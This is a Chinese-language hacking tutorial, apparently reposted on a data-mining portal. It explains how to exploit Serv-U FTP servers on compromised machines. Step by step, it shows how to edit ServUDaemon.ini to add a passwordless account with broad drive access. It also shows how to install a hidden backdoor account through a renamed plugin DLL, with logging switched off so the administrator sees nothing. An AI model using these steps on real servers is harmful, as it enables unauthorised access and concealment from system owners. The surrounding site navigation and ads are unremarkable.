如何利用肉鸡上的Serv


很多肉鸡安装了serv-U服务器,我们可以把它利用起来,下面的方法是可以通过telnet或者nc命令行直接修改serv-U的参数而利用之。

在serv-U的目录下有一个servudaemon.ini,关键是修改servudaemon.ini,第一步,当然是要先把对方的servudaemon.ini下载回来,在本机把它修改好。至于怎么把这个文件取回来不是这里讨论的问题,方法很多。

下面请看一个servdaemon.ini的范例,<>中是我写的说明文字,不是文件中的文字。

[GLOBAL] <定义一些全局参数> 数据挖掘实验室
Version=4.0.0.4
RegistrationKey=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAawEEBLH71T7nA+cDAgAIUm9nZXJMZWUSbGls

aW5nanVuQHNpbmEuY29tB0VDTGlQU0UA
ProcessID=1748
[DOMAINS] <在这里定义域名及IP,端口号>
Domain1=0.0.0.0
21|Wizard Generated Domain|1|0
[Domain1] <用户名的定义>
User1=Anonymous|1|0 <第一个用户是anonymous,即匿名用户,允许匿名用户访问>
User2=1|1|0 <第二个用户是1>
User3=2|1|0 <第三个用户是2>
[USER=Anonymous|1] <用户“anonymous”的定义>
HomeDir=d:wutemp <用户anonymous的根目录>
RelPaths=1 <锁定在根目录,如果不锁定在根目录可以把该行删除>
TimeOut=600
Note1="Wizard generated account"
Access1=D:WUTemp|RLP <用户anonymous权限设置在此处,R表示读文件,L表示目录列表,最后一个P必须有>
[USER=2|1] <用户“2”的定义>
Password=cuA40FB53D1C89D1E7153EF826B6B38DC3 <用户密码设定,我不知道怎么破这个密码,如果不设密码可以把该行删除> 数据挖掘工具
HomeDir=D: emp
RelPaths=1
TimeOut=600
Access1=D: emp|RLP <用户“2”可以读取d: emp目录下的文件,所以可以下载文件>
[USER=1|1] <用户“1”的定义>
Password=hv12154DF65AC601DDA5D39C2F7B2E0F4C
HomeDir=d: emp
RelPaths=1
TimeOut=600
Access1=D: emp|RWLP <用户“1”对d: emp有列目录的权利,可以读写该目录下的文件>

权限设定具体说明:
RL 只能读文件,下载文件
RWL 可以写文件,所以可以上载文件
RWML M是可以删除的权限
RWAMEL A是添加权限,E是执行权限
RWLCD C是目录创建权限,D是目录删除权限

OK,所以首先是把对方的servudaemon.ini下载到本地的机器上,根据自己的需要把这个文件修改好,然后再传上去覆盖原文件。

修改的步骤是在[DOMAIN1]中先添加用户名称,如上例中已经有三个用户anonymous、1、2,再添加一个用户3,密码为空,在d: emp目录下可以读写文件、创建删除目录,不锁定在本目录,同时对C:有访问权限。

先在[Domain1]下增加一个用户,如下:
user4=3|1|0

然后再增加一个段,说明用户“3”的权限
[user3|1]
HomeDir=d: emp

数据挖掘研究院


TimeOut=600
Access1=D: emp|RWLCDP
Access2=C:|RLP

在 Serv-U 中建立隐藏用户(本地通过,未经肉鸡测试~~希望大家完善本文)

在如今的 FTP 服务段软件中,Serv-U 以其简单易用性成为广大管理员的首选,当我
们控制一台肉鸡后,如果它采用 Serv-U 管理 FTP ,我们该如何建立一个隐藏的 FTP 账
户来下载他的东东呢?

我们可以采用 Serv-U Assistant 这个软件,可以到作者网页 http://www.katkat.com/ 或
者在华军下载(目前版本为1.01)

这个软件主要用于扩充 Serv-U 的帐号管理, 它采用Serv-U扩展库,实现的原理为“帐
号-映射”,建立一个或多个帐号“映射”,当在 Serv-U 中设置好一个固定帐号(即Serv-U
的帐号)后,“映射帐号”就继承了这个固定帐号的所有权限设置,每个“映射帐号” 有各
自的登录密码。

下载压缩文件 AssServU.zip,解压后得到以下文件:
AssServU.dll -------- 扩充功能库
AssServU.exe -------- 管理主程序
AssServU.ini -------- 配置文件
AssServU.mdb -------- 数据库文件 数据挖掘工具
AssReadme.mht ------- 自述文件

我们的目的是为了隐藏我们 FTP 账号,因此第一步我们要获取肉鸡上的一个 Serv-U 
的账户名(仅账户名而已):3389图形界面可以通过 ServUAdmin.exe 获得;命令行下可以
通过 ServUDaemon.ini 获得,当然最好获得权限比较大的用户名(因为我们的隐藏账号的
权限与他的相同)

第二步:在自己的机器上做好配置:首先为了隐藏的需要,我们将assServU.mdb复制
一份为ServU.dat ,将assServU.dll改名为ServU.dll ;
双击 assServU.exe ,在 Settting 选项卡下的 Log options 中去掉 Log system 
messages 、 Log error messages 、 Log file dosnloads 、 Log file uploads 前面的勾(这是
为了系统不记录日志);在 Account Datasource 中选 Custom ,在 Connection string 点 
Set ,在“连接”选项卡中的“1。选择或输入数据库名称”中将 AssServU.mdb 改为 
Servu.dat ,然后点“确定”,在退回 Setting 选项卡后点 Save 。
在 Account 选项卡下添加用户, Username 为你想添加的用户,如:hacker, Password 
为你的密码,如:123, Serv-U account 为第一步中你选择的权限较大的用户,如:admin,
然后点 Save 按钮。

好了,配置完成。

第三步:上传我们的 ServU.dat 和 ServU.dll ,修改肉鸡的 ServUDaemon.ini 文件,添加
以下字段:
[EXTERNAL]
ClientCheckDLL1=ServU.dll
然后重起Serv-U 服务

这样你就可以用隐藏账号登陆了,此时登陆账号还是第一步你选择的账号,但密码格式
为“你的用户名=密码”,如果你像第二步那样设置的话,登陆名就为admin,密码为hacker=111

hehe,这样管理员在管理界面什么都看不出来
OK,game over!
[数据挖掘专家] [数据挖掘研究院] [数据挖掘论坛] [数据挖掘实验室]
上一篇:域名的概念与机制
下一篇:BitTorrent服务器架设指南
最新评论共有 0 位网友发表了评论 , 查看所有评论
发表评论( 不能超过250字,需审核,请自觉遵守互联网相关政策法规。 )
匿名?
数据挖掘网站导航 数据挖掘论坛导航
  • 数据挖掘工具
  • 数据挖掘论坛
  • DataCruncher - Cognos
  • MineSet - MathSoft
  • Intelligent Miner - GainSmarts
  • Sqlserver - SAS - Clementine
  • CART - Weka - WizSoft
  • NeuroShell - ModelQuest
  • data mining tools - Darwin
  • 数据挖掘交友
  • 数据挖掘博客
  • 数据挖掘工具
  • 数据挖掘资源
  • 数据挖掘技术算法
  • 数据挖掘相关期刊、会议
  • 研究院联盟合作专区
  • 数据挖掘基础与相关技术
  • 数据挖掘厂商与就业
  • 数据挖掘研究者乐园
  • 知名厂商数据挖掘工具资料
  • 国内数据挖掘实验室
  • Foreign Data Mining Lab
  • 热点关注
  • 构筑更安全的乐园
  • 国内域名解析服务器DNS分布表
  • Linux环境下基于策略的路由
  • 基于UNIX平台FTP服务器的建立
  • 调优Web站点性能完全攻略
  • Internet防火墙技术及安全策略
  • 拖动改变Table的列宽度
  • 国产FTP助手
  • 个人电脑变网站服务器全面解决方案
  • 网络安全漏洞检测
  • 论坛最新话题
  • Foundations of Statistical Natural Langu
  • Game Theory meet Data Mining: A Recent P
  • System Building: How does it help or hin
  • 数据挖掘与Clementine培训
  • 新手报到
  • 求 SASEM 客户流失预测分析
  • 数据挖掘工程师/搜索研究院—北京——无线
  • 数据挖掘入门介绍(如何着手数据挖掘)
  • Information Overload Survey Results
  • The INEX 2005 Workshop on Element Retrie
  • 相关资讯
  • 调优Web站点性能完全攻略
  • IIS6.0下ASP的新增功能(五)
  • 实战J2EE开发购物网站经验篇
  • IIS6.0下ASP的新增功能(四)
  • IIS6.0下ASP的新增功能(一)
  • IIS6.0下ASP的新增功能(三)
  • 个人电脑变网站服务器全面解决方案
  • 国产FTP助手
  • TAB键的缩排处理
  • Serv
  • 数据挖掘实验室资料
  • 数据挖掘博客地址
  • 数据挖掘实验室网站地址
  • Prepare for Medicare audits by using dat
  • 注册成为SAS用户与爱好者俱乐部会员
  • 水南梅
  • 明日烟
  • 新人报道
  • 下载
  • 厦门服务器托管,450元/月—0592-5177319 高
  • 买空间送域名--0592-5177319 高静